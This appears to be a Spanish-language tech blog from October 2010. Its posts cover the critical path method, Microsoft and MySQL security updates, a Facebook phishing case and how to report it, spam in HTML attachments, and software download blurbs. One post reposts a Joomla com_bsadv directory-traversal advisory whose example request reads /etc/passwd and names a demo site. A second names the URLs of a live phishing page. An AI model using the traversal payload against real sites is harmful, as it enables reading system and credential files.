jueves, 21 de octubre de 2010

El CPM (Critical Path Method)

El método de la ruta crítica fue inventado por la coorporación DuPont y es comúnmente abreviado como CPM por las siglas en inglés de Critical Path Method. En administración y gestión de proyectos, una ruta crítica es la secuencia de los elementos terminales de la red de proyectos con la mayor duración entre ellos, determinando el tiempo más corto en el que es posible completar el proyecto.

La duración de la ruta crítica determina la duración del proyecto entero. Cualquier retraso en un elemento de la ruta crítica afecta a la fecha de término planeada del proyecto, y se dice que no hay holgura en la ruta crítica.

Un proyecto puede tener varias rutas críticas paralelas. Una ruta paralela adicional a través de la red con las duraciones totales menos cortas que la ruta crítica es llamada una sub-ruta crítica.

Originalmente, el método de la ruta crítica consideró solamente dependencias entre los elementos terminales. Un concepto relacionado es la cadena crítica, la cual agrega dependencias de recursos. Cada recurso depende del manejador en el momento donde la ruta crítica se presente.

A diferencia de la técnica de revisión y evaluación de programas (PERT), el método de la ruta crítica usa tiempos ciertos (reales o determinísticos).

Sin embargo, la elaboración de un proyecto basándose en redes CPM y PERT son similares y consisten en:

Identificar todas las actividades que involucra el proyecto, lo que significa, determinar relaciones de precedencia, tiempos técnicos para cada una de las actividades.
Construir una red con base en nodos y actividades (o arcos, según el método más usado), que implican el proyecto.

Analizar los cálculos específicos, identificando las rutas críticas y las holguras de los proyectos.
En términos prácticos, la ruta crítica se interpreta como la dimensión máxima que puede durar el proyecto y las diferencias con las otras rutas que no sean la crítica, se denominan tiempos de holgura.

jueves, 14 de octubre de 2010

Boletines de seguridad de Microsoft en octubre

Este martes Microsoft ha publicado 16 boletines de seguridad (del MS10-071 al MS10-086) correspondientes a su ciclo habitual de actualizaciones. Según la propia clasificación de Microsoft cuatro de los boletines presentan un nivel de gravedad "crítico", diez son clasificados como "importantes", mientras que los dos restantes son de grado "moderado". En total se han resuelto 49 vulnerabilidades.

Sin duda se trata de una actualización histórica, nunca Microsoft había publicado un grupo de boletines tan amplio ni se habían corregido tantas vulnerabilidades. Y a estás alturas, cuando aún quedan dos meses para finalizar el año, ya se ha superado el número de boletines publicados en años anteriores (nunca se había alcanzado la cifra de 80 boletines de seguridad).

Se ha publicado una actualización acumulativa (de carácter crítico) para Internet Explorer, que además resuelve siete nuevas vulnerabilidades. Otras actualizaciones críticas han afectado al servicio de uso compartido de red del reproductor Windows Media, al motor de fuentes OpenType y a .Net Framework. Todas las vulnerabilidades críticas resueltas podrían llegar a permitir la ejecución remota de código.

Por otra parte, los boletines clasificados como "importantes" afectan a SafeHTML, a los controladores en modo kernel de Windows, al controlador de formato de fuente OpenType (OTF), a la biblioteca de controles comunes de Windows, al Reproductor de Windows Media, a la validación COM en el shell de Windows y WordPad, a la llamada a procedimiento remoto de Windows, a SChannel y también se han corregido once vulnerabilidades en Microsoft Word y otras trece en Excel.

Por último las vulnerabilidades moderadas corregidas afectan a Microsoft Foundation Classes y a discos de clúster compartido de Windows.

Las actualizaciones publicadas pueden descargarse a través de Windows Update o consultando los boletines de Microsoft donde se incluyen las direcciones de descarga directa de cada parche. Dada la gravedad de las vulnerabilidades se recomienda la actualización de los sistemas con la mayor brevedad posible.



Más Información:

Resumen del boletín de seguridad de Microsoft de octubre de 2010 http://www.microsoft.com/spain/technet/security/bulletin/ms10-oct.mspx

Actualización de seguridad acumulativa para Internet Explorer (2360131)
http://www.microsoft.com/spain/technet/security/bulletin/ms10-071.mspx

Una vulnerabilidad en el servicio de uso compartido de red del Reproductor de Windows Media podría permitir la ejecución remota de código (2281679)
http://www.microsoft.com/spain/technet/security/bulletin/ms10-075.mspx

Una vulnerabilidad en el motor de fuentes OpenType insertadas podría permitir la ejecución remota de código (982132)
http://www.microsoft.com/spain/technet/security/bulletin/ms10-076.mspx

Una vulnerabilidad en .NET Framework podría permitir la ejecución remota de código (2160841)
http://www.microsoft.com/spain/technet/security/bulletin/ms10-077.mspx

Vulnerabilidades en SafeHTML podrían permitir la divulgación de información (2412048)
http://www.microsoft.com/spain/technet/security/bulletin/ms10-072.mspx

Vulnerabilidades en los controladores en modo kernel de Windows podrían permitir la elevación de privilegios (981957)
http://www.microsoft.com/spain/technet/security/bulletin/ms10-073.mspx

Vulnerabilidades en el controlador de formato de fuente OpenType (OTF) podrían permitir la elevación de privilegios (2279986)
http://www.microsoft.com/spain/technet/security/bulletin/ms10-078.mspx

Vulnerabilidades en Microsoft Word podrían permitir la ejecución remota de código (2293194)
http://www.microsoft.com/spain/technet/security/bulletin/ms10-079.mspx

Vulnerabilidades en Microsoft Excel podrían permitir la ejecución remota de código (2293211)
http://www.microsoft.com/spain/technet/security/bulletin/ms10-080.mspx

Una vulnerabilidad en la biblioteca de controles comunes de Windows podría permitir la ejecución remota de código (2296011)
http://www.microsoft.com/spain/technet/security/bulletin/ms10-081.mspx

Una vulnerabilidad en el Reproductor de Windows Media podría permitir la ejecución remota de código (2378111)
http://www.microsoft.com/spain/technet/security/bulletin/ms10-082.mspx


Una vulnerabilidad en la validación COM en el shell de Windows y WordPad podría permitir la ejecución remota de código (2405882)
http://www.microsoft.com/spain/technet/security/bulletin/ms10-083.mspx

Una vulnerabilidad en la llamada a procedimiento remoto de Windows podría provocar la elevación de privilegios (2360937)
http://www.microsoft.com/spain/technet/security/bulletin/ms10-084.mspx

Una vulnerabilidad en SChannel podría permitir la denegación de servicio (2207566)
http://www.microsoft.com/spain/technet/security/bulletin/ms10-085.mspx

Una vulnerabilidad en Microsoft Foundation Classes podría permitir la ejecución remota de código (2387149)
http://www.microsoft.com/spain/technet/security/bulletin/ms10-074.mspx

Una vulnerabilidad en discos de clúster compartido de Windows podría permitir la alteración de datos (2294255)
http://www.microsoft.com/spain/technet/security/bulletin/ms10-086.mspx

viernes, 8 de octubre de 2010

Phishing a través de redes sociales y mecanismos de denuncia y bloqueo

Phishing a través de redes sociales y mecanismos de denuncia y bloqueo

Últimamente las redes sociales se han arraigado tanto en la nueva cultura de la sociedad de la información de tal manera que sitios como Facebook han logrado crear una red de mercado, áun no muy bien aprovechado pero donde los usuarios gastan su dinero para comprar créditos y enviar invitaciones virtuales, juegos, publicidad, etc. Pero siempre que hay dinero de por medio, hay otras personas que están interesadas en sacar partida de ésto aprovechándose de la inexperiencia de muchos y falta de información sobre todo.

En ésta ocasión mostraremos el ejemplo de un mensaje de phishing a través de Facebook y cómo utilizar el mecanismo que ofrece éste sitio para denunciar y así evitar de alguna manera la propagación de éste tipo de mensajes, veamos el ejemplo.

Lo primero que sucede es recibir la notificación de un nuevo mensaje a la bandeja de mensajes.
Posteriormente, el usuario abre el mensaje y visualiza algo como esto:

Aquí fácilmente podemos darnos cuenta de la falsedad del mensaje, además sin fuera cierto no les recomiendo hacer clic en ninguno de los enlaces acortados que provengan de fuentes desconocidas, en éste ejemplo se utiliza el redirector tk.

La dirección acortada en el ejemplo es: http://admin-account-service-banned-poker.tk/

Pero si analizamos el enlace, realmente dirige hacia la dirección: http://bismilah-dapat-banyak.t35.com/

Y se muestra la página para capturar las cuentas y contraseñas de facebook a continuación:

Haciendo éste análisis resulta muy sencillo determinar que es una estafa, pero les recomiendo en términos generales evitar hacer clic en culquier enlace que provenga de fuente desconocida, y evitar entrar a sitios desconocidos.

En el ejemplo anterior la página mostrada está diseñada curiosamente para que una vez que el usuario ingrese sus datos ésta se redirige a la página de zynga poker y de esa manera, un usuario normal no podría notar que los datos de su cuenta han sido tomados por otra gente.

Bueno, ahora veamos cómo denunciar y bloquear éste tipo de mensajes.

Lo primero que se puede hacer es denuciar directemente el mensaje, como se muestra a continuación.



Se mostrará un mensaje como éste y elegimos el motivo de la denuncia y bloquear a ésta persona, después hacer clic en aceptar.


Cabe destacar que Facebook tiene una red muy grande y bien formada de inspectores de seguridad, tanto de contenidos como de privacidad en los datos, aunque es casi imposible controlar el cien por ciento del flujo de los datos. Lo que les quiero comentar que a los dos minutos que hice la denuncia por recibir éste mensaje, inmediatamente eliminaron el perfil y la cuenta del captor. Lo que no me dio tiempo de hacer la captura de pantalla del perfil de la cuenta que enviaba el mensaje, pero aquí tenemos un ejemplo más de phishing, en ésta ocasión utilizado en la red social más popular del momento.

Lo que falta hacer es denunciar el perfil del phisher, pero para eso hay que ingresar al perfil que se desea denunciar y hacer clic en el enlace denunciar o bloquear a ésta persona el cual se localiza en la parte inferior izquierda de todos los perfiles, junto al botón compartir, como se muestra a continuación.


Y finalmente, se selecciona el motivo del bloqueo en este caso se selecciona perfil falso, y no representa a una persona real, además bloquear a ésta persona y hacer clic en el botón Aceptar.


Y con rapidez sorprendente Facebook elimina la cuenta, eso sucedió en ésta ocasión. Espero que ésta información les haya sido de utilidad, nos vemos!

Ing. Cruz.

miércoles, 6 de octubre de 2010

Portal Coppermine Personalizado profesional


Hola a todos, esta ocasión quiero invitar a aquellos interesados en mejorar el aspecto de su galería coppermine les comento que estoy en disposición de realizar trabajos de personalización de acuerdo al uso que le deseen dar a la galería agregando una página estilo portal, vean el siguiente ejemplo para que se den una idea, ese es un proyecto en el que he trabajado ya hace tiempo. Pero se puede rediseñar a su gusto.

http://topmetroflog.site40.net

El costo de rediseño va de acuerdo al nivel de dificultad y el uso que finalmente se le dará a la galería, el precio base es de $100 DLS. Saludos.

Daemon Tools Lite 4.35.6




Daemon Tools es básicamente una aplicación para crear unidades de CD virtuales en tu disco duro y emular las protecciones físicas de algunos CD-ROM y DVD-ROM.
Daemon Tools crea una unidad virtual (o hasta cuatro si así lo deseas) como si se tratase de un reproductor más de DVD y CD, sólo que en él podrás cargar imágenes de CD o DVD (CUE, ISO, CCD, BWT, MDS y CDI) emulando protecciones como Safedisc, Laserlock o Securom.

Gracias a Daemon Tools, te ahorrarás desperdiciar muchos CD.

Nota sobre Daemon Tools:
Daemon Tools es gratuito para uso no comercial

Cambios recientes en Daemon Tools:
Soporta Windows 7
Correcciones
Acerca de la licencia:
Durante la instalación, se ofrece la posibilidad de instalar una barra de herramientas en el explorador (Daemon Tools Searchbar), que es opcional. No obstante si se instala y más adelante se desea eliminar, se puede hacer desde el panel de control, agregar o quitar programas
Para utilizar Daemon Tools necesitas:
Sistema operativo: Win2000/XP/Vista/7

Descarga desde el sitio web del autor http://www.daemon-tools.cc/eng/downloads

Argente Utilities 1.0.3.1 Final




Argente Utilities es un pack de utilidades para realizar el mantenimiento, optimizar y mejorar la seguridad de tu PC.
En cuanto al mantenimiento, Argente Utilities ofrece un sistema automático para corregir problemas frecuentes en el PC, un limpiador del Registro de Windows, un limpiador de archivos innecesarios y una función para no dejar rastro alguno de nuestra actividad en el PC.

Para optimizar tu PC, Argente Utilities tiene un desinstalador de programas, un gestor de aplicaciones que cargan al iniciar Windows, un administrador de procesos y un optimizador general del sistema.

En lo relacionado con la seguridad, Argente Utilities cuenta con un limpiador y un inmunizador de spyware, un administrador de opciones avanzadas del sistema operativo y un reparador de errores frecuentes.

Para completar la oferta de Argente Utilities encontramos, en la sección Herramientas, una recopilación de pequeñas utilidades de Argente y acceso directo a casi un centenar de utilidades incluidas en Windows.

Argente Utilities es, en conclusión, un pack gratuito de utilidades muy recomendable y que aún evolucionará más con cada versión.

Cambios recientes en Argente Utilities:
Corregido falso positivo de Spyware Cleaner en sistemas 64 bits
Para utilizar Argente Utilities necesitas:
Sistema operativo: Win2000/XP/2003/Vista/7

Descargue desde la web del autor http://argentesoftware.blogspot.com/

The Joomla Bsadv component suffers from local file inclusion and directory traversal vulnerabilities.

A las andadas... esta vez regresamos a los más simple.

###############################################
# com_bsadv Directory Traversal Vulnerability
###############################################
#[~] Author : Fl0riX | Bug Researchers
#[!] Greetz: Sakkure And All My Friends
#[!] Script_Name: Joomla com_bsadv
#[!] Demo :http://www.simons5.com/portal/
#[!] Example;
/index.php?option=com_bsadv&controller=../../../../../../../../etc/passwd%00
###############################################




Via http://www.packetstormsecurity.org/1010-exploits/joomlabsadv-lfi.txt
   

Se populariza el spam en formato HTML

Probablemente ya lo hayan notado, pero últimamente se está recibiendo en mayor medida correo basura con HTMLs adjuntos. Los atacantes están usando este formato para robar datos y redirigir a las víctimas a otras web. Es la nueva "moda" del spam.

El correo siempre ha sido el método de distribución predilecto del spam y malware. Desde hace muchos años, los atacantes han adjuntado al correo ejecutables de todo tipo (exe, cmd, pif, bat, vbs... y todas las combinaciones de dobles extensiones posibles) en un intento de infectar sistemas. Esto hace tiempo que está superado por los filtros y normalmente son bloqueados a nivel de perímetro, pero existen otros formatos menos populares que se utilizan a menudo.

Aproximadamente en 2002, se hicieron muy populares los correos basura que solo contenían imágenes. Con esto, los atacantes conseguían eludir los filtros por palabras (primera reacción obvia contra el spam). Como respuesta a las imágenes, los filtros antispam comenzaron a utilizar plugins OCR (software de reconocimiento óptico de caracteres), capaz de interpretar el texto en los gráficos. A continuación les tocó mover ficha a los spammers, y comenzaron a introducir "ruido" en las imágenes para dificultar el reconocimiento automático por este tipo de software.

En junio de 2007, sufrimos una verdadera avalancha de spam en formato PDF. Aprovechando que casi todos los sistemas cuentan con un lector, los atacantes incrustaron la publicidad en un PDF, o incluso en una imagen dentro del PDF. La campaña de envío fue masiva y los filtros no funcionaron los primeros días, pero muy pronto los programadores se pusieron a trabajar y comenzaron a mirar dentro de estos archivos (aunque demostraron no estar preparados para el primer golpe, dado el éxito del que disfrutaron los atacantes las primeras horas). Luego el formato PDF se usaría más para infectar con malware... pero en esto tiene mucho más que decir Adobe que los creadores de filtros de correo basura.

Ahora, parece que los atacantes están usando archivos HTML adjuntos para distribuir basura e incluso infectar a sistemas. Los utilizan de dos formas:

* En vez de colgar un phishing en una web, lo incluyen todo en ese HTML. La víctima lo abre en local, ve una web muy parecida a la de un banco u otra entidad, introduce los datos y son enviados al estafador. Así, los atacantes consiguen no tener que preocuparse por mantener un phishing colgado en algún ISP que en cualquier momento podría eliminarlo, e incluso evadir los filtros antiphishing basados en listas negras, puesto que una dirección "local" no aparecería nunca en ellos.

* Los HTML contienen redirectores (código JavaScript o HTML convenientemente ofuscado) que enlaza a otra web. Al abrir ese HTML adjunto, el usuario es redirigido y puede esperarle un phishing o un intento de infección. Con esto consiguen eludir filtros antispam basados en la detección del método "clásico" de incrustar directamente URLs en el cuerpo de un correo fraudulento.

A partir de ahí, las combinaciones son varias: imágenes dentro del HTML, ofuscación de texto... Con este nuevo método, están consiguiendo eludir algunos filtros antispam y confundir a las víctimas menos avezadas. Aunque obtienen algunas ventajas y están consiguiendo llegar a las bandejas de entrada, en realidad los filtros antispam están haciendo un buen trabajo contra este método desde un primer momento (no como ocurrió en 2007con los PDF) y en general, la mayoría acaban en el correo basura. Aun así, está siendo bastante usado y conviene tenerlo en cuenta.



Más Información:

Se populariza el spam en formato PDF
http://www.hispasec.com/unaaldia/3167

Actualización de MySQL por múltiples vulnerabilidades

Se ha publicado la versión 5.1.51 de MySQL destinada a corregir múltiples vulnerabilidades en MySQL, que podrían permitir a un atacante provocar condiciones de denegación de servicio o lograr ejecutar comandos con privilegios elevados.

Existe un problema en el tratamiento de comentarios de versión en MySQL que podría permitir a un atacante remoto ejecutar sentencias SQL con privilegios de superusuario.

Otros problemas de denegación de servicio residen en la evaluación de argumentos de funciones como "LEAST()" y "GREATEST()", en la re-evaluación de valores provenientes de tablas auxiliares, en el tratamiento de la la sentencia 'GROUP_CONCAT' en combinación con 'WITH ROLLUP', en el tratamiento de funciones como "GREATEST()" o "LEAST()", en la ejecución de sentencias que utilizan tablas temporales, al procesar sentencias "join" anidadas en procedimientos almacenados o un error cuando se pre-evalúan argumentos "LIKE" durante la preparación de la vista.

Se recomienda la actualización a MySQL versión 5.1.51 :
http://dev.mysql.com/downloads/

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)